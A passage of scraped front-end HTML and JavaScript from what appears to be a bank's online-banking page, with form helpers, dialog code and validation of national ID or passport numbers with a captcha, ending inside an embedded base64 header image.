{ document.frmmain.fldfilerefno.value = document.frmmain.elements[i].value+'~'+document.frmmain.fldfilerefno.value; } if(document.frmmain.elements[i].checked==true) { flgbtn=true; document.frmmain.flddelrefno.value = document.frmmain.elements[i].value+'~'+document.frmmain.flddelrefno.value; } } } if(flgbtn==false){ alert("Please select a file to remove"); return false; } document.frmmain.fldSectionId.value = p_sectionid ; //document.frmmain.fldPrevRequestId.value = p_prevrequestid; return SendTxnRequest(p_requestid.substring(5,7),p_requestid.substring(2,5)); } //----------------------------------------------------------------------------------------- function checkForAuditLogFrame() { var l_auditWindName = self.name; // setting self.name in l_auditWindName // compare it with frame self.name if it matches with SSR or VAL frame name // put modal window. if(l_auditWindName=="frame_audit_txn"){ if(document.getElementById("divsession")) { document.getElementById("divsession").style.display = ""; } } } //----------------------------------------------------------------------------- function displayBackwardCompatibilityStatusMessage () { return; } //----------------------------------------------------------------------------- function fnToggleComponent ( toggledivid , urlimageopen , urlimageclose ) { var sectionId = document.getElementById (toggledivid); if (sectionId == null) { return; } var imgSrc = document.getElementById ("img_" + toggledivid); if (imgSrc == null) { return; } if (sectionId.style.display == '' || sectionId.style.display == 'block') { sectionId.style.display = 'none'; imgSrc.src = urlimageclose; } else { sectionId.style.display = ''; imgSrc.src = urlimageopen; } } //----------------------------------------------------------------------------- //----------------------------------------------------------------------------------------- function custom_alert(output_msgs, title_msg) { var out_msg; if ($.isArray (output_msgs)) { if (output_msgs.length > 1) { out_msg = "<ul><li>"; for (i = 0; i < output_msgs.length; i++) { out_msg += output_msgs [i]; if (i + 1 != output_msgs.length) { out_msg += "</li><li>"; } } out_msg = "</li></ul>"; } else { out_msg = output_msgs [0]; } } else { out_msg = output_msgs; } $("<div></div>").html(out_msg).dialog({ title: title_msg, resizable: false, modal: true, buttons: { "Ok": function() { $( this ).dialog( "close" ); } } }); } //------------------------------------------------------------------------ //------------------------------------------------------------- function staticwindow_open ( p_formObj , p_windowTitleText , p_id ) { if (!p_formObj){ p_formObj = document.frmEntitySwitch; } var window_name = 'process_' + p_id; var frm_action; var l_windowObj = window.open ( '' , window_name , 'toolbar=0,location=0,directories=0,status=1,menubar=0,scrollbars=1,resizable=0,left=0,top=0,width=' + window.screen.width + ',height=' + window.screen.height ); l_windowObj.moveTo(0, 0); l_windowObj.resizeTo(screen.width, screen.height); p_formObj.target = window_name; if (p_formObj.title || p_formObj.title != '') { p_formObj.title.value = p_windowTitleText; } else { var l_inputTitle = document.createElement ('input'); l_inputTitle.type = 'hidden'; l_inputTitle.name = 'title'; l_inputTitle.value = p_windowTitleText; p_formObj.appendChild (l_inputTitle); } p_formObj.fldRequestId.value = p_id; frm_action = p_formObj.action; p_formObj.action = "process.jsp" if (l_windowObj) { l_windowObj.focus (); } p_formObj.submit (); p_formObj.action = frm_action; } //---------------------------------------------------------------------------- function fnGetAppLayRelWidth () { return l_appLayWidth - 25; } //---------------------------------------------------------------------------- </script><div id="divsession" class="modalWhitebackground" style="display:none" ></div><div id="errorTab" style="display:none;height:auto;width:100%;cursor:hand; " ></div><div id="printWarning" class="noPrintWarning" ><div class="iconHolder warningMsg" ></div><div class="alertmsgbox" ></div></div><div id="dialog-modal-error" title="Messages" ><table id="error-dialog-table" style="width:100%;display:none" cellpadding="1" cellspacing="1" ></table></div><html lang="en" ><head><!--[if lte IE 7]><link rel="stylesheet" href="https://ib.mcb.mu/T001/css/eng_01.css" type="text/css" /><![endif]--><![if (!IE) | (gte IE 8)]><link rel="stylesheet" href="https://ib.mcb.mu/T001/css/eng_01.uri.css" type="text/css" /><![endif]><meta name="viewport" content="width=device-width; initial-scale=1; minimal-ui" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" ></meta><meta HTTP-EQUIV="no-cache" ></meta><title></title><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/Ajax.js" ></script><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/common.js" ></script><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/rsa_compiled.js" ></script><script language="JavaScript" type="text/JavaScript" > function fnBack(){ $("input[type='button']").prop('disabled',true); document.frmmain.fldRequestId.value='RRUSR11'; document.frmmain.submit(); } function fnSubmit(){ $("input[type='button']").prop('disabled',true); if($("#fldnicno").prop("checked")) { if($.trim($("#fldIdentificationNoNic").val())=='' || $.trim($("#fldIdentificationNoNic").val()).length !=$("#fldIdentificationNoNic").val().length ||$.trim($("#fldIdentificationNoNic").val()).length < 14 || /\s/g.test($('#fldIdentificationNoNic').val())){ $("#fldIdentificationNoNicInline").css("display","block"); $("#fldIdentificationNoNic").addClass("input-error"); $("input[type='button']").prop('disabled',false); return false; } else{ $("#fldIdentificationNoNicInline").css("display","none"); $("#fldIdentificationNoNic").removeClass("input-error"); } } else if($("#fldpassportno").prop("checked")) { if($.trim($("#fldIdentificationNoPass").val())=='' || $.trim($("#fldIdentificationNoPass").val()).length !=$("#fldIdentificationNoPass").val().length ||$.trim($("#fldIdentificationNoPass").val()).length < 5 || /\s/g.test($('#fldIdentificationNoPass').val())){ $("#fldIdentificationNoPassInline").css("display","block"); $("#fldIdentificationNoPass").addClass("input-error"); $("input[type='button']").prop('disabled',false); return false; } else{ $("#fldIdentificationNoPassInline").css("display","none"); $("#fldIdentificationNoPass").removeClass("input-error"); } } if(validateCaptcha()){ document.frmmain.fldRequestId.value='RRUSR03'; document.frmmain.submit(); } else{ return false; } } function toggleIdentificationNo(selradio) { $("#fldIdentificationNoNic").val(''); $("#fldIdentificationNoPass").val(''); $("#fldIdentificationNoPassInline").css("display","none"); $("#fldIdentificationNoPass").removeClass("input-error"); $("#fldIdentificationNoNicInline").css("display","none"); $("#fldIdentificationNoNic").removeClass("input-error"); if(selradio.id=='fldnicno'){ $("#fldIdentificationNoPass").prop('disabled',true); $("#fldIdentificationNoPass").css('background',"#f0f0f0 none repeat scroll 0 0"); $("#fldIdentificationNoNic").prop('disabled',false); $("#fldIdentificationNoNic").css('background',""); } else if(selradio.id=='fldpassportno'){ $("#fldIdentificationNoNic").prop('disabled',true); $("#fldIdentificationNoNic").css('background',"#f0f0f0 none repeat scroll 0 0"); $("#fldIdentificationNoPass").prop('disabled',false); $("#fldIdentificationNoPass").css('background',""); } } function isValid(evt) { var charCode = (evt.which) ? evt.which : evt.keyCode; var retVal = ((charCode >= 48 && charCode <= 57) || ///0-9 Number ASCII (48~57) (charCode >= 65 && charCode <= 90) || ///A~Z Upper Case Alphabet ASCII (65~90) (charCode >= 97 && charCode <= 122) ///a~z Lower Case Alphabet ASCII (97~122) ); if (retVal ==false) { return false; } else { return true; } } </script></head><body class="workarea" onload="getCaptchaImage();" style="width:auto;" ><style> #headerWrapper { background: #fff; border-bottom: 1px solid #ececec; position: absolute; width: 100%; height: 72px; top: 0; left: 0; margin: 0; padding: 0; border: 0; } #header { padding: 0; position: relative; width: 960px; margin: 0 auto; border: 0; } #_topMenu { width: 100%; height: 70px; background-repeat: no-repeat; background-image: url(data:image/jpeg;base64,/9j/4QAYRXhpZgAASUkqAAgAAAAAAAAAAAAAAP/sABFEdWNreQABAAQAAABkAAD/4QMvaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLwA8P3hwYWNrZXQgYmVnaW49Iu+7vyIgaWQ9Ilc1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCI/PiA8eDp4bXBtZXRhIHhtbG5zOng9ImFkb2JlOm5zOm1ldGEvIiB4OnhtcHRrPSJBZG9iZSBYTVAgQ29yZSA1LjYtYzAxNCA3OS4xNTY3OTcsIDIwMTQvMDgvMjAtMDk6NTM6MDIgICAgICAgICI+IDxyZGY6UkRGIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyI+IDxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiIHhtbG5zOnhtcD0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLyIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bXA6Q3JlYXRvclRvb2w9IkFkb2JlIFBob3Rvc2hvcCBDQyAyMDE0IChXaW5kb3dzKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo5MzUzN0VBQzI3RTQxMUU2OEZFQjgzQ0VFNDc0MzI1NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo5MzUzN0VBRDI3RTQxMUU2OEZFQjgzQ0VFNDc0MzI1NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjkzNTM3RUFBMjdFNDExRTY4RkVCODNDRUU0NzQzMjU2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjkzNTM3RUFCMjdFNDExRTY4RkVCODNDRUU0NzQzMjU2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+/+4ADkFkb2JlAGTAAAAAAf/bAIQAAQEBAQEBAQEBAQEBAQEB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